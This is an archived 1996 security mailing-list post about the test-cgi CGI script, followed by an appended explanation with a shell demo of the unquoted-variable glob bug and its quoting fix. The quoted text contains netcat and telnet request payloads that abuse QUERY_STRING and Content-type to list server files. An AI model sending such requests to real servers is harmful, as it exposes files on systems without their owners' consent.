[3574] in WWW Security List Archive


Re: test-cgi

daemon@ATHENA.MIT.EDU (Steff Watkins)
Mon Nov 18 10:33:42 1996

Date: Mon, 18 Nov 1996 13:18:31 +0000 (GMT)
From: Steff Watkins <Steff.Watkins@Bristol.ac.uk>
To: www-security@ns2.rutgers.edu
In-Reply-To: <Pine.OSF.3.93.961117084403.20735B-100000@novice.uwaterloo.ca>
Errors-To: owner-www-security@ns2.rutgers.edu

On Sun, 17 Nov 1996 htorgema@novice.uwaterloo.ca wrote:

> Some versions of NCSA and Apache have corrected the QUERY_STRING line, but
> not the CONTENT_TYPE nor the CONTENT_LENGTH line, while this data can be
> easily spoofed ( see example below ).
> In fact, the CONTENT_TYPE line is potentially more 'dangerous' than the
> QUERY_STRING line because usually, http daemons don't log this field.
> 
> > Example exploit:
> > 
> > machine% echo "GET /cgi-bin/test-cgi?/*" | nc removed.name.com 80
> 
> or:
> 
> machine% telnet www.host.com 80
> GET /cgi-bin/test-cgi HTTP/1.0
> Content-type: /*
> 
> <Cgi output displayed here>

Hello,

 excuse my ignorance but......

What possible 'security' risk could there be in setting the CONTENT_TYPE 
(or CONTENT_LENGTH) variables???

If a browser sets the content type, then the server is 'informed' of 
what sort of data it can send back. If the target file is a script, then 
the server will return whatever script output there is. If the target 
file is of a set MIME type, then that file will be returned.

With CONTENT_LENGTH, that can either be set to be too short or too long 
for the incoming data. If too short, then the incoming data is truncated. 
If too long, then there would either not be enough data to fill in the 
incoming buffer, or the server will pad the buffer to the correct length.

I'm sorry but I cannot see how being able to set either of these two 
hand-shakes would constitute a potential security hole.

Can someone please explain?

Steff

: Steff Watkins, General Computer-type being
: University of Bristol, Clifton, Bristol, BS8 1TH, UK
:
: RFC-822 : Steff.Watkins@bris.ac.uk
: X-400   : /G=Steff/S=Watkins/O=Bristol/PRMD=UK.AC/ADMD= /C=GB/   
: Phone: +44 177 9287869 (external)   3046 / 7869    (internal)  
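As an added illustration of the risk asked about above (not code from the thread, nor the NCSA/Apache test-cgi script itself): test-cgi was a Bourne-shell script that echoed its environment variables unquoted, so a header value such as `/*` is glob-expanded by the shell into a directory listing before it is echoed back to the client. The function names and the scratch directory are constructed for this example; the fix is simply to quote the expansion.

```shell
#!/bin/sh
# Added example, not part of the original thread. Shows why an unquoted
# "echo ... $CONTENT_TYPE" in a CGI shell script turns a request header of
# "Content-type: /*" into a directory listing, and that quoting prevents it.

# Vulnerable pattern (as in old test-cgi): the unquoted variable is subject
# to word splitting and pathname (glob) expansion by the shell.
vuln_echo() {
    echo CONTENT_TYPE = $CONTENT_TYPE
}

# Hardened pattern: double quotes keep the value literal.
safe_echo() {
    echo "CONTENT_TYPE = $CONTENT_TYPE"
}

# Create a constructed scratch directory with two files and point
# CONTENT_TYPE at a glob over it, the way the quoted exploit sets the header.
setup_scratch() {
    SCRATCH=$(mktemp -d)
    : > "$SCRATCH/secret.txt"
    : > "$SCRATCH/config.txt"
    CONTENT_TYPE="$SCRATCH/*"
    export CONTENT_TYPE
}

cleanup_scratch() {
    rm -rf "$SCRATCH"
}

# Return 0 when the given echo function leaks a real filename, 1 otherwise.
leaks_filename() {
    case "$("$1")" in
        *secret.txt*) return 0 ;;
        *)            return 1 ;;
    esac
}

# Stand-alone demo: prints both outputs so the difference is visible.
demo() {
    setup_scratch
    vuln_echo   # prints the two files in the scratch directory
    safe_echo   # prints the literal pattern ending in /*
    cleanup_scratch
}
```

Run `demo` to see the leak and the fix side by side; the same quoting issue applies to QUERY_STRING, which is why the `test-cgi?/*` form works on scripts that echo it unquoted.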
